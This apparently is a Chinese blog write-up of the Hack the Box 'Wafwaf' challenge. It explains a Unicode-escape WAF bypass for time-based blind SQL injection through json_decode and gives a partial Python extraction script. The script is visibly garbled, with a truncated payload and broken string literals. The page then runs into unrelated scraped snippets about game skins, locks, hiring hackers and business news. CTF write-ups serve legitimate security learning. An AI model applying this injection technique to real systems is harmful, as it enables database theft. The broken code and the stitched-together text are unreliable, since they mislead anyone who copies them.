Hack the Box——Wafwaf(代码审计) wp

访客4年前黑客资讯814

0x00前言


又开始了一天的学习之路,首先打开了我的Hack the Box

Wafwaf

1611453329_600cd391641143be627d3.png!small?1611453329717

提示:My clas *** ate Jason made this *** all and super secure note taking application, check it out!(我的同学Jason *** 了这个小型且超级安全的笔记记录应用程序,请查看!)


0x01访问网站


访问界面,简单明了,直接给了源码

http://159.65.87.50:31703/

1611453347_600cd3a3048db28be997e.png!small?1611453347301

显然就是代码审计了

简单看下代码,流程就是:php://input获取数据=> waf函数验证非法字符=>? 解码json数据=> 执行sql语句

0x02代码分析

  • error_reporting(0)? 关闭错误报告。

  • preg_match_all? ? ? 函数用于执行一个全局正则表达式匹配。

  • preg_quote()? ? ? ? ? 需要参数 str 并向其中 每个正则表达式语法中的字符前增加一个反斜线。 这通常用于你有一些运行时字符串 需要作为正则表达式进行匹配的时候。

  • 正则表达式特殊字符有: . \ + * ? [ ^ ] $ ( ) { }=! < > | : -

  • json_decode? ? ? ? ? 对 *** ON 格式的字符串进行解码。

  • file_get_contents() 把整个文件读入一个字符串中。

问题

  • 没过滤全sql关键字,还可以注入

  • preg_match_all函数可能有问题,可能可以通过某种输入绕过正则

  • php://input可能有漏洞

  • json_decode函数可能有漏洞

0x03寻找答案

首先,检查 waf() *** 时,我们收到输入并验证筛选。如果不在筛选json_decode,则可以看到使用 *** 返回值。
query() *** 获取 $obj->user 的值并发送 SQL 请求,但查看返回值时,不会返回特定值,也不会输出错误。所以首先好像是Time Based Blind SQLI问题

然后,我们检查 waf 的参数值,获取并交出php://input的值。

php://input获取原始数据,该数据将作为 Post 请求的主体部分。

将值发送到原始数据,以便获取并输出该值。因此,让我们将 SQLI 有效负载作为原始数据

1611453427_600cd3f31e4867caa9220.png!small?1611453427445

在json_decode中,它转换为字符串并返回。Unicode Escape?可以在此处完成。

0x04解决问题

理论上应该可以用sqlmap自定义tamper去跑的,但是自己尝试半天没有成功,最后自己写了盲注脚本,花了我一下午的时间,最后跑这个脚本还等了我一晚上的时间

#!/usr/bin/python3
# -*- coding:utf-8 -*-
"""
@author: maple
@file: wafwaf.py
@time: 2021/1/23 17:10
@desc: 
"""

from requests import post
from time import time
from json import dumps

url="http://159.65.87.50:31703"
headers={'content-type': 'application/json'}
payload=
-".format(second_time - first_time))
    elif mode=='2':
        for i in range(100):
            first_time=time()
            if i < 10:
                unicode_="\0 + str(i)
            elif i >=10 and i < 20:
                unicode_="\1\0 + str(i)[1]
            elif i >=20 and i < 30:
                unicode_="\2\0 + str(i)[1]
            elif i >=30 and i < 40:
                unicode_="\3\0 + str(i)[1]
            elif i >=40 and i < 50:
                unicode_="\4\0 + str(i)[1]
            elif i >=50 and i < 60:
                unicode_="\5\0 + str(i)[1]
            elif i >=60 and i < 70:
                unicode_="\6\0 + str(i)[1]
            elif i >=70 and i < 80:
                unicode_="\7\0 + str(i)[1]
            elif i >=80 and i < 90:
                unicode_="\8\0 + str(i)[1]
            elif i >=90 and i < 100:
                unicode_="\9\0 + str(i)[1]
            else:
                unicode_="\1\0\0"
            post(url, data=json_update(query.format(unicode_), '0'), headers=headers)
            second_time=time()

            if second_time - first_time >=4.9:
                print("[*] Sleep : {}".format(second_time - first_time))
                print("[*] {} : {}
-".format(string, i))
                break
    elif mode=='3':
        result=''
        for j in range(1, Len + 1):
            unicode__="\0 + str(j)
            for i in range(33, 128):
                if i >=33 and i < 40:
                    unicode_="\3\0 + str(i)[1]
                elif i >=40 and i < 50:
                    unicode_="\4\0 + str(i)[1]
                elif i >=50 and i < 60:
                    unicode_="\5\0 + str(i)[1]
                elif i >=60 and i < 70:
                    unicode_="\6\0 + str(i)[1]
                elif i >=70 and i < 80:
                    unicode_="\7\0 + str(i)[1]
                elif i >=80 and i < 90:
                    unicode_="\8\0 + str(i)[1]
                elif i >=90 and i < 100:
                    unicode_="\9\0 + str(i)[1]
                elif i >=100 and i < 110:
                    unicode_="\1\0\0 + str(i)[2]
                elif i >=110 and i < 120:
                    unicode_="\1\1\0 + str(i)[2]
                elif i >=120 and i < 130:
                    unicode_="\1\2\0 + str(i)[2]
                else:
                    unicode_="\1\3\0 + str(i)[2]
                first_time=time()
                post(url, data=json_update(query.format(unicode__, unicode_), '0'), headers=headers)
                second_time=time()

                if second_time - first_time >=4.9:
                    result +=chr(i)
                    break
        print("[*] {} : {}".format(string, result))
        print("-")

代码此处贴一半,有需要的人自己尝试完善,也可以私聊我给你。

这套代码如果以后遇到基于时间的盲注还可以复用

最后脚本跑出来的结果

1611457881_600ce559490986a668954.png!small?1611457881705

0x05总结

因为一开始对这题没有任何思路,尝试了多种sqlmap知识,然后一直在google和百度,但是都没有找到解决办法,但是也乘机见识了很多新的姿势,比如各种绕过,也学会了编写时间注入的tamper脚本


相关文章

豹女皮肤勇者多少钱,lol豹女勇者皮肤一年出几次

  是限定不外是老皮肤了。是樱色火焰的特效。和勇者豹女时一个系列的,特效也差不多,此刻仿佛不卖了   我想买这个皮肤,不知好欠悦目,要豹报价子形态和人性拉近游戏截图个一张,有冯晓泉。   下个盒子要什...

耶鲁指纹锁哪个好 耶鲁指纹锁介绍

耶鲁指纹锁哪个好 耶鲁指纹锁介绍

  今朝市场上有许多智能锁品牌,也有很是的的产物。一个品牌大概就会有几十到几百款差异的产物。那么这些产物的差别在那边呢?尤其是对那些知名的品牌。相信各人都相识国耶鲁指纹锁吧,那么详细耶鲁指纹锁哪个好,...

怎么能找入侵蚊香社的黑客

真正的黑客是需要看懂代码,然后自己来发觉漏洞,楼下说的探测方法那只是菜鸟的方法,真正的黑客就是要读懂代码并发现新的漏洞。 1.百度打上黑客然后去一些黑客论坛里招版主。在问。2.去一些QQ群。去问。但是...

贾跃亭申请破产前月薪9万美元什么情况?贾跃亭申请破产原因曝光

贾跃亭申请破产前月薪9万美元什么情况?贾跃亭申请破产原因曝光

10月14日,一个名为“贾跃亭债务处理小组”的微博号发布声明称,贾跃亭已于美国当地时间10月13日根据美国相关法律第11章主动申请个人破产重组。而贾跃亭在国内的债务尚未清偿完毕。 贾跃亭的债权人...

黄柏的神奇功效你知道吗?(关节疼痛者的福音

黄柏的神奇功效你知道吗?(关节疼痛者的福音

现在很多人都有关节痛的表现,中医没有关节病的概念,有的是痹症的概念,中医将痹症分为三个部分,分别是寒痹,湿痹,痛痹,其中湿痹是比较常见的一种痹症。 这是由于湿痹与气候环境有很大的相关性,比如说南...

找黑客拜师,斯凯黑客网

一、拜师怎么找黑客 1、网上被骗接单接单黑客如果遵守命令以比其他方式更多的节省时间,黑客将同意接受某种形式的权威。拜师斯凯Lisp是值得学习的,因为当你最终掌握它时,你会获得丰富的经验,使你成为一个更...